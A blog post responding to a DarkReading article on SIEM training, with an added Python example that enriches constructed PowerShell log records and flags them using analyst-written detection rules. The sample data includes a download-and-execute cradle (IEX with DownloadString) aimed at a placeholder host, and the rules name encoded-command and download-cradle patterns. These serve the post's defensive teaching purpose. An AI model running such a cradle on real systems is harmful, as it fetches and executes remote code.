Article at DarkReading titled: SIEM Training Needs a Better Focus on the Human Factor. Pretty short article, but has a good point to make.
Training from SIEM vendors is based on how to use their products. This is and should be required to properly use any solution, but it isn’t enough. SIEM is a tool, and the focus must also be on the individual(s) wielding the tool.
By changing the focus to individuals, the core problem can start to be addressed. For example, assume you or another staff member attended training on how to catch the bad guys using a SIEM system. The focus, rather than being on maintaining/using a SIEM product, is on things such as which data sources are important, why they’re important, and how to enrich those data sources so they make more sense, add context, and are more useful. The training may also include various methods to intentionally set up events to automatically send alerts on unauthorized activity. Would this individual not be better equipped to use any SIEM platform?
Yes, to the last question! This is why I believe in knowing how security works. Knowing how the surgical, smaller tools work, and exactly what you’re looking at and looking for. If you know the basics and have a strong foundation, you can probably wield any larger tool with a small amount of time to learn the specifics of that tool. Not only that, but you can ask about and properly evaluate a new tool better!
I also like a sub-point the author makes by using PowerShell malware detection as an example. Vendors aren’t going to teach an analyst what to look for. You have to learn it elsewhere or figure it out. And that’s not necessarily intuitive. That’s part of the sauce that makes infosec practitioners a somewhat advanced profession.
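The PowerShell point above, together with the article's emphasis on enriching data sources so they carry context, as an added example that is not from the DarkReading article or this post: a small Python pipeline that enriches constructed PowerShell script-block log records (Windows Event ID 4104 is the real event; everything else is sample data) with a hypothetical asset inventory and user directory, then applies a few analyst-written rules for what to look for and scores the result by who ran it and where. The rule patterns, inventory, hosts, users and log lines are all assumptions constructed for the example, not anything a vendor ships.

```python
import base64
import re

# --- Constructed context sources (hypothetical inventory, not real data) ---
ASSET_INVENTORY = {
    "WS-0417": {"role": "workstation", "criticality": "low"},
    "BUILD-02": {"role": "build-server", "criticality": "medium"},
    "DC-01": {"role": "domain-controller", "criticality": "high"},
}
USER_DIRECTORY = {
    "jsmith": {"dept": "finance", "admin": False},
    "ci_runner": {"dept": "engineering", "admin": False},
    "svc_ad": {"dept": "it", "admin": True},
}

# --- Analyst-written detection rules over the logged script-block text ---
# (name, pattern, base severity). This is the "what to look for" that training
# on a vendor's product does not teach; the patterns are assumptions for the example.
RULES = [
    ("encoded_command",
     re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I), 3),
    ("download_cradle",
     re.compile(r"(?:\bIEX\b|Invoke-Expression).*?(?:DownloadString|DownloadFile|Invoke-WebRequest)", re.I), 4),
    ("hidden_window", re.compile(r"-WindowStyle\s+Hidden", re.I), 1),
]
CRITICALITY_BONUS = {"low": 0, "medium": 1, "high": 2}


def decode_encoded_command(blob):
    """-EncodedCommand takes base64 of UTF-16LE text; return the text, or None if it is not that."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def enrich(event):
    """Attach asset and user context so the analyst sees who and where, not only what."""
    enriched = dict(event)
    enriched["asset"] = ASSET_INVENTORY.get(event["host"], {"role": "unknown", "criticality": "medium"})
    enriched["identity"] = USER_DIRECTORY.get(event["user"], {"dept": "unknown", "admin": False})
    return enriched


def evaluate(enriched):
    """Run every rule over the script text; return an alert dict, or None if nothing matched."""
    matched, severity, decoded = [], 0, None
    for name, pattern, weight in RULES:
        m = pattern.search(enriched["script"])
        if not m:
            continue
        matched.append(name)
        severity += weight
        if name == "encoded_command":
            decoded = decode_encoded_command(m.group(1))  # enrichment: show the analyst the real command
    if not matched:
        return None
    # Context raises the score: a high-value host or an admin account matters more.
    severity += CRITICALITY_BONUS[enriched["asset"]["criticality"]]
    if enriched["identity"]["admin"]:
        severity += 1
    return {
        "host": enriched["host"],
        "user": enriched["user"],
        "criticality": enriched["asset"]["criticality"],
        "rules": matched,
        "severity": severity,
        "decoded_command": decoded,
    }


def run_pipeline(events):
    """Enrich, then evaluate each record; return only the alerts, highest severity first."""
    alerts = [a for a in (evaluate(enrich(e)) for e in events) if a]
    return sorted(alerts, key=lambda a: a["severity"], reverse=True)


def _encoded(text):
    """Build an -EncodedCommand argument the way PowerShell expects it (for the constructed sample)."""
    return base64.b64encode(text.encode("utf-16-le")).decode("ascii")


# Constructed sample records in the shape a collector might emit for Event ID 4104.
SAMPLE_EVENTS = [
    {"host": "WS-0417", "user": "jsmith", "event_id": 4104,
     "script": "Get-ChildItem C:\\Users\\jsmith\\Documents | Measure-Object"},
    {"host": "WS-0417", "user": "jsmith", "event_id": 4104,
     "script": "powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand " + _encoded("Start-Sleep 1")},
    {"host": "BUILD-02", "user": "ci_runner", "event_id": 4104,
     "script": "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x.ps1')"},
    {"host": "DC-01", "user": "svc_ad", "event_id": 4104,
     "script": "Get-ADUser -Filter * -Properties LastLogonDate | Export-Csv report.csv"},
]

if __name__ == "__main__":
    for alert in run_pipeline(SAMPLE_EVENTS):
        print(alert)
```

The point of the example is the split the article draws: the rules and the enrichment tables are knowledge the analyst brings, and any SIEM is just the place they get plugged in. Note that the benign admin query on the domain controller produces no alert even though it runs on the most critical host, while the same encoded-command pattern on a workstation would score higher if the user were an admin.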